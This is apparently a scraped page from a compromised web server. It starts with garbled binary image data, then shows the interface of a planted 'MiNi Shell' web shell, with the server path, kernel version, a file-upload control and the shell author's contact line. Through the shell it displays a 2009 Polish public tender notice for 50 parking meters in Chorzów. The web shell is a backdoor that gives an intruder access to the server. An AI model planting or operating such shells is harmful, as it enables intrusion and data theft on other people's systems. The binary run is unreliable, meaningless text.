JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090323/53373-N-2009.html

<p class="kh_header"><b>Chorzów: Dostaw, montaż i uruchomienie 50 szt. jednakowych fabrycznie nowych parkomatów w strefie płatnego parkowania w Chorzowie, a także zapewnienie oprogramowania, łączności, serwisu gwarancyjnego oraz ich bieżącego utrzymania.</b><br>
<b>Numer ogłoszenia: 53373 - 2009; data zamieszczenia: 23.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Katowicka 105, 41-500 Chorzów, woj. śląskie, tel. (032) 2411270, 2411-279, faks 032 2414060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.chorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostaw, montaż i uruchomienie 50 szt. jednakowych fabrycznie nowych parkomatów w strefie płatnego parkowania w Chorzowie, a także zapewnienie oprogramowania, łączności, serwisu gwarancyjnego oraz ich bieżącego utrzymania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę, montaż i uruchomienie 50 szt. jednakowych fabrycznie nowych parkomatów w Strefie Płatnego Parkowania w Chorzowie, a także zapewnienie oprogramowania, łączności, serwisu gwarancyjnego oraz ich bieżącego utrzymania.
Szczegółowo przedmiot zamówienia został opisany w Opisie przedmiotu zamówienia stanowiącym Rozdział IV niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.70.00.00-2, 38.73.00.00-1, 50.23.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości 12.000,00 zł. (słownie: dwanaście  tysięcy złotych). 
2.Wadium musi być wniesione przed upływem terminu składania ofert w następujących formie/formach, w zależności od wyboru Wykonawcy:
2.1.Pieniądzu, przelewem na rachunek bankowy: Miejski Zarząd Ulic i Mostów w Chorzowie,ul. Katowicka 105  Nr rachunku: ING Bank Śląski S.A. o/Chorzów 
Nr 72 1050 1243 1000 0010 0000 3770
2.2.Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym.
2.3.Gwarancjach bankowych.
2.4.Gwarancjach ubezpieczeniowych.
2.5.Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 z późn. zm.).
3.W przypadku wniesienia wadium w pieniądzu kserokopię dowodu przelewu należy dołączyć do oferty, natomiast w przypadku wniesienia wadium w formie innej niż w pieniądzu powyższy oryginalny dokument należy złożyć w siedzibie Zamawiającego -Dział Księgowości, a potwierdzoną kopię wniesienia wadium w tej formie należy dołączyć do oferty. 
4.Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w terminie składania ofert znajdzie się na koncie Zamawiającego.
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6.Wadium musi obejmować cały okres związania ofertą.
7.Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
7.1.Upłynie termin związania ofertą.
7.2.Zostanie zawarta umowa i wniesione zostanie zabezpieczenie należytego wykonania tej umowy.
7.3.Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.
8.Z zastrzeżeniem art. 46 ust. 4a ustawy - Prawo zamówień publicznych, Zamawiający dokona niezwłocznie zwrotu wadium, na pisemny wniosek Wykonawcy:
8.1.Który wycofał ofertę przed upływem terminu składania ofert.
8.2.Który został wykluczony z postępowania.
8.3.Którego oferta została odrzucona.
9.Zamawiający zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na skutek zaistnienia okoliczności wskazanych w pkt. 8.2. i 8.3., jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy winni wnieść wadium w terminie określonym przez Zamawiającego.
10.Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Pzp  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn  nieleżących 
po jego stronie.
12.Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
12.1.Odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie.
12.2.Nie wniesie wymaganego zabezpieczenia należytego wykonania umowy.
12.3.Zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki ogólne i szczegółowe. 
1.Warunki ogólne, Wykonawcy muszą wykazać, że:
1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać (w zakresie warunków ogólnych), że warunek 	określony w pkt. 1.4. spełnia każdy z Wykonawców, natomiast warunki określone w pkt. 1.1., 1.2., 1.3. spełniają łącznie wszyscy Wykonawcy.
3.Warunki szczegółowe:
3.1.Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamontował i uruchomił co najmniej 100  szt. urządzeń do automatycznego pobierania lub wydawania środków pieniężnych, wydających jednocześnie pokwitowanie (m.in. parkomatów, bankomatów, urządzeń kontroli wjazdu - wyjazdu itp.) na terenie Europy.
3.2.Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przez okres, co najmniej 1 roku serwisował urządzenia do automatycznego pobierania lub wydawania środków pieniężnych, wydających jednocześnie pokwitowanie (m.in. parkomatów, bankomatów, urządzeń kontroli wjazdu - wyjazdu itp.).
3.3.Wykonawca musi wykazać, że w okresie ostatnich 3 lat proponowane urządzenia (lub podobne wymienione w pkt. 5.3.1. i 5.3.2. urządzenia tego samego producenta) zostały zainstalowane i działają na terenie Europy w liczbie, co najmniej 100 szt.
W celu potwierdzenia spełniania w/w warunków Wykonawca musi przedstawić wykaz wykonanych dostaw a także dołączyć dokumenty, w których Zamawiający potwierdził poprawność, rzetelność i terminowość wykonanych dostaw wraz ze wskazaniem rodzaju dostarczonych i serwisowanych urządzeń. Zamawiający uzna doświadczenie Wykonawcy jako Podwykonawca, przy spełnianiu powyższych warunków.
3.4.Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone.
Wykonawca przedstawi w ofercie kandydata na każde stanowisko wymienione poniżej:Lp. - Stanowisko - Wymagana liczba osób - Doświadczenie zawodowe.
1.-Kierownik serwisu-1 osoba-1 rok.
2.-Kierownik zmiany-2 osoby-1 rok.
3.-Pracownik serwisu-2 osób-1/2 roku.
Zamawiający wymaga, aby Wykonawca dysponował w/w potencjałem kadrowym, przez cały okres realizacji przedmiotu zamówienia. 
3.5.W zakresie sytuacji finansowej i ekonomicznej, Wykonawca musi wykazać:
3.5.1.Dysponowanie środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu obrotowego lub innego o ile środki te nie są przeznaczone na zrealizowanie konkretnego celu) i-lub zdolnością kredytową w wysokości nie mniejszej niż 500.000,00 zł. (słownie: pięćset tysięcy złotych).
3.5.2.Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość, co najmniej 200.000,00 zł. (słownie: dwieście tysięcy zł).
4.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać (w zakresie warunków szczegółowych), że warunki określone w pkt. 3.1., 3.2., 3.3., 3.4., 3.5. spełniają łącznie wszyscy 	Wykonawcy.
5.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie oświadczeń i dokumentów wg. formuły spełnia - nie spełnia. Nie spełnienie jakiegokolwiek warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu (ogólnych i szczegółowych) należy załączyć:
1.1.Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt. 1 - 3 ustawy Pzp -zał nr. 1 do oferty.
1.2.Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp - 	zał. nr. 2 do oferty.
1.3.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (Potencjał kadrowy). Wykaz musi zawierać dane na temat doświadczenia wskazanych osób, potwierdzając jednocześnie spełnienie warunku określonego przez Zamawiającego - zał. nr. 3 do oferty.
1.4.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 1.3 Wykonawca wykazał osoby, którymi będzie dysponował.
1.5.Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Do informacji winny być dołączone dokumenty potwierdzające, że wymienione w informacji prace zostały wykonane należycie - zał. nr. 4 a, b i c do oferty.
1.6.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.7.Aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, 	że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 	raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania 	ofert.
1.8.Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym Wykonawca posiada 	rachunek, potwierdzającą, że posiadane środki finansowe i-lub zdolność kredytowa Wykonawcy są nie mniejsze niż wymagane przez Zamawiającego. Powyższe dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.9.Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym działalności zgodnej z przedmiotem niniejszego zamówienia, na kwotę nie mniejszą niż wymagana przez 	Zamawiającego.
1.10.Opis proponowanego urządzenia wraz z wizualizacją.
1.11.Wzór proponowanej gwarancji jakości urządzenia (na okres co najmniej 3 lat, dla obudowy okres gwarancji winien wynosić, co najmniej 6 lat).
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentów, o których mowa w pkt 1.6., 1.7. składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
2.1.Nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2.2.Nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2.3.Nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu.
3.Dokumenty, o których mowa w pkt. 2.1. i 2.2. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Dokument, o którym mowa w pkt. 2.3. powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
6.Zasady składania oferty przez podmioty występujące wspólnie:
6.1.Oferta musi być podpisana przez osobę upoważnioną (np. wspólnika spółki cywilnej lub pełnomocnika 	konsorcjum).
6.2.Wymagane oświadczenia lub dokumenty wskazane w pkt. 1.2. oraz pkt. 1.6. - 1.7. powinny być złożone przez każdy podmiot.
7.Podmioty występujące wspólnie (z wyjątkiem wspólników spółki cywilnej) zobowiązane są do złożenia 	wraz z ofertą pełnomocnictwa do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarciu umowy o udzielenie zamówienia publicznego. Podmioty występujące wspólnie mogą złożyć umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnictwo lub umowa o współdziałaniu musi zostać złożone jako część oferty i musi być w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
8.Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści wyraźnie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo to musi zostać złożone jako część oferty i musi być w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.mzuim.chorzow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Ulic i Mostów, 41-500 Chorzów, ul. Katowicka 105.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:45, miejsce: Miejski Zarząd Ulic i Mostów, 41-500 Chorzów, ul. Katowicka 105 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 15.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com